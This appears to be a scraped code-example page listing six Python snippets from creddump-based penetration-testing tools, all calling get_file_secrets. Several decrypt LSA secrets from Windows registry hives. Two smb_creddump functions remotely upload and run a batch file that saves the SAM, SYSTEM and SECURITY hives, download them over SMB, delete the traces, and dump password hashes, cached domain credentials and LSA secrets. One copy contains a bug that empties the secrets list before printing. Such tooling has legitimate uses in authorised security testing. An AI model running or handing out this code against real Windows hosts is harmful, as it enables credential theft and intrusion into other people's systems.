Python get_file_secretsの例、framework.win32.lsasecrets.get_file_secrets Pythonの例

コード例 #1

0

ファイルを表示

ファイル: lsadump.py プロジェクト: SirEOF/creddump7

    print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[
        0]


def dump(src, length=8):
    N = 0
    result = ''
    while src:
        s, src = src[:length], src[length:]
        hexa = ' '.join(["%02X" % ord(x) for x in s])
        s = s.translate(FILTER)
        result += "%04X   %-*s   %s\n" % (N, length * 3, hexa, s)
        N += length
    return result


if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)
else:
    vista = True if sys.argv[3] == "true" else False

secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
    sys.exit(1)

for k in secrets:
    print k
    print dump(secrets[k], length=16)

コード例 #2

0

ファイルを表示

ファイル: lsadump.py プロジェクト: Jumbo-WJB/creddump7

    print "\nExample (Windows Vista/7):"
    print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
    print "\nExample (Windows XP):"
    print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]


def dump(src, length=8):
    N=0; result=''
    while src:
       s,src = src[:length],src[length:]
       hexa = ' '.join(["%02X"%ord(x) for x in s])
       s = s.translate(FILTER)
       result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
       N+=length
    return result

if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)
else:
    vista = True if sys.argv[3] == "true" else False

secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
    sys.exit(1)

for k in secrets:
    print k
    print dump(secrets[k], length=16)

コード例 #3

0

ファイルを表示

ファイル: smb.py プロジェクト: n3tsky/smbwrapper

def smb_creddump():
	"""
	[-s] <ip> [ user ] [ passwd/nthash ]
	Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
	"""

	try:
		sys.path.insert(0, BASEDIR + '/creddump')
		from framework.win32 import hashdump, domcachedump, lsasecrets
	except:
		text("[!] Error: Creddump dependency missing.", 1)

	set_creds(3)

	text("[*] Extracting hives...")

	tmpfile = '/tmp/cred_run.bat'

	bat = ['@echo off', 'cd \\windows\\temp', 
		'reg save HKLM\\SAM sam.hive /y',
		'reg save HKLM\\SYSTEM system.hive /y',
		'reg save HKLM\\SECURITY security.hive /y']

	open(tmpfile, 'w').write('\r\n'.join(bat))

	smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
	print winexe('\\windows\\temp\\cred_run.bat')

	text("[*] Downloading hives...")
	smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
	smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
	smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])

	text("[*] Removing temp files...")
	smbclient('del "\\windows\\temp\\cred_run.bat"')
	smbclient('del "\\windows\\temp\\sam.hive"')
	smbclient('del "\\windows\\temp\\system.hive"')
	smbclient('del "\\windows\\temp\\security.hive"')
	os.unlink(tmpfile)

	text("[*] Extracting SAM credentials...")
	hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')

	text("[*] Extracting MSCASH credentials...")
	domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

	# Code below ripped from creddump's lsadump.py
	text("[*] Extracting LSA Secrets...")
	try:
		FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
		secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

		if not secrets:
			text("[!] Unable to read LSA secrets.")

		else:
			for k in secrets:
				N = 0
				length = 16
				result = ''
				while secrets[k]:
					s, secrets[k] = secrets[k][:length],secrets[k][length:]
					hexa = ' '.join(["%02X" % ord(x) for x in s])
					s = s.translate(FILTER)
					result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
					N += length
				
				print k
				print result
	except:
		pass

	text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")

コード例 #4

0

ファイルを表示

ファイル: lsadump.py プロジェクト: Gifts/Responder

from framework.win32.lsasecrets import get_file_secrets

# Hex dump code from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812

FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])

def dump(src, length=8):
    N=0; result=''
    while src:
       s,src = src[:length],src[length:]
       hexa = ' '.join(["%02X"%ord(x) for x in s])
       s = s.translate(FILTER)
       result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
       N+=length
    return result

if len(sys.argv) < 3:
    print "usage: %s Bootkey <security hive>" % sys.argv[0]
    sys.exit(1)

secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2])
if not secrets:
    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
    sys.exit(1)

for k in secrets:
    print k
    print dump(secrets[k], length=16)

コード例 #5

0

ファイルを表示

ファイル: lsadump.py プロジェクト: zer0x0/wifipineapple-modules

# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812

FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
                  for x in range(256)])


def dump(src, length=8):
    N = 0
    result = ''
    while src:
        s, src = src[:length], src[length:]
        hexa = ' '.join(["%02X" % ord(x) for x in s])
        s = s.translate(FILTER)
        result += "%04X   %-*s   %s\n" % (N, length * 3, hexa, s)
        N += length
    return result


if len(sys.argv) < 3:
    print "usage: %s Bootkey <security hive>" % sys.argv[0]
    sys.exit(1)

secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2])
if not secrets:
    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
    sys.exit(1)

for k in secrets:
    print k
    print dump(secrets[k], length=16)

コード例 #6

0

ファイルを表示

ファイル: smb.py プロジェクト: prsood/smbwrapper

def smb_creddump():
    """
	[-s] <ip/file/range> [ user ] [ passwd/nthash ]
	Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
	"""

    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except:
        text("[!] Error: Creddump dependency missing.", 1)

    set_creds(3)

    text("[*] %s Extracting hives..." % (CONF["smb_ip"]))

    tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"])

    bat = [
        '@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y',
        'reg save HKLM\\SYSTEM system.hive /y',
        'reg save HKLM\\SECURITY security.hive /y'
    ]

    open(tmpfile, 'w').write('\r\n'.join(bat))

    smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
    text("[*] %s Running cred_run.bat\n%s\n" %
         (CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat')))

    text("[*] %s Downloading hives..." % (CONF["smb_ip"]))
    smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' %
              CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' %
              CONF['smb_ip'])

    text("[*] %s Removing temp files..." % (CONF["smb_ip"]))
    smbclient('del "\\windows\\temp\\cred_run.bat"')
    smbclient('del "\\windows\\temp\\sam.hive"')
    smbclient('del "\\windows\\temp\\system.hive"')
    smbclient('del "\\windows\\temp\\security.hive"')
    os.unlink(tmpfile)

    text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"]))
    hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
                                       CONF['smb_ip'] + '_sam.hive')

    text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"]))
    mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
                                           CONF['smb_ip'] + '_security.hive')

    text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes)))
    text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash)))

    # Code below ripped from creddump's lsadump.py
    text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"]))
    try:
        FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
                          for x in range(256)])
        secrets = lsasecrets.get_file_secrets(
            CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

        if not secrets:
            text("[!] %s Error(smb_creddump): Unable to read LSA secrets." %
                 (CONF["smb_ip"]))

        else:

            secrets = []

            for k in secrets:
                N = 0
                length = 16
                result = ''
                while secrets[k]:
                    s, secrets[k] = secrets[k][:length], secrets[k][length:]
                    hexa = ' '.join(["%02X" % ord(x) for x in s])
                    s = s.translate(FILTER)
                    result += "%04X   %-*s   %s\n" % (N, length * 3, hexa, s)
                    N += length

                secrets.append(k)
                secrets.append(result)

            text("[*] %s LSA Secrets\n%s" %
                 (CONF["smb_ip"], "\n".join(secrets)))
    except:
        pass

    text(
        "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory."
        % (CONF["smb_ip"]))